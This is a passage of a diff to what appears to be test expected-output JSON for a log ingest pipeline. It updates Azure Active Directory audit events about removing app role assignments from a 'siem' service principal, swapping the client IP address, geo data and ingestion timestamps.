cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"d8a2ae24-a752-4f8e-adca-c57189a76a71\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add a deletion-marked app role assignment grant to service principal as part of link removal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:41:51.124859400Z", + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T15:34:06\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"ac045271-8d7f-49b2-abc9-5130051d879f\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T15:34:06.3062012Z\"},{\"Name\":\"env_epoch\",\"Value\":\"31CXC\"},{\"Name\":\"env_seqNum\",\"Value\":\"38464434\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##2b06f483-d288-458d-b40b-af7ad69a2407_00000000-0000-0000-0000-000000000000_2b06f483-d288-458d-b40b-af7ad69a2407\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR556\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"d8a2ae24-a752-4f8e-adca-c57189a76a71\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add a deletion-marked app role assignment grant to service principal as part of link removal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", "kind": "event", @@ -1387,25 +1261,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "83.57.233.151" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -1419,7 +1275,7 @@ "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ResultStatus": "Success", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "actorObjectClass": "User", "teamName": "MSODS.", @@ -1555,7 +1411,7 @@ "asr" ], "ip": [ - "83.57.233.151" + "67.43.156.15" ] }, "organization": { @@ -1567,12 +1423,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:38.036107500Z", - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-09T15:34:06\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"ac045271-8d7f-49b2-abc9-5130051d879f\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T15:34:06.3062012Z\"},{\"Name\":\"env_epoch\",\"Value\":\"31CXC\"},{\"Name\":\"env_seqNum\",\"Value\":\"38464425\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##2b06f483-d288-458d-b40b-af7ad69a2407_00000000-0000-0000-0000-000000000000_2b06f483-d288-458d-b40b-af7ad69a2407\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR556\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"7f09b681-251f-4ff0-97cf-5247891b6981\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Remove app role assignment from service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:41:51.124866Z", + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T15:34:06\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"ac045271-8d7f-49b2-abc9-5130051d879f\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T15:34:06.3062012Z\"},{\"Name\":\"env_epoch\",\"Value\":\"31CXC\"},{\"Name\":\"env_seqNum\",\"Value\":\"38464425\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##2b06f483-d288-458d-b40b-af7ad69a2407_00000000-0000-0000-0000-000000000000_2b06f483-d288-458d-b40b-af7ad69a2407\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR556\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"7f09b681-251f-4ff0-97cf-5247891b6981\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Remove app role assignment from service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", "kind": "event", @@ -1598,25 +1454,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "83.57.233.151" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -1630,7 +1468,7 @@ "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ResultStatus": "Success", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "actorObjectClass": "User", "teamName": "MSODS.", @@ -1766,7 +1604,7 @@ "asr" ], "ip": [ - "83.57.233.151" + "67.43.156.15" ] }, "organization": { @@ -1778,12 +1616,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:38.036113100Z", - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-09T15:34:06\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"ac045271-8d7f-49b2-abc9-5130051d879f\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 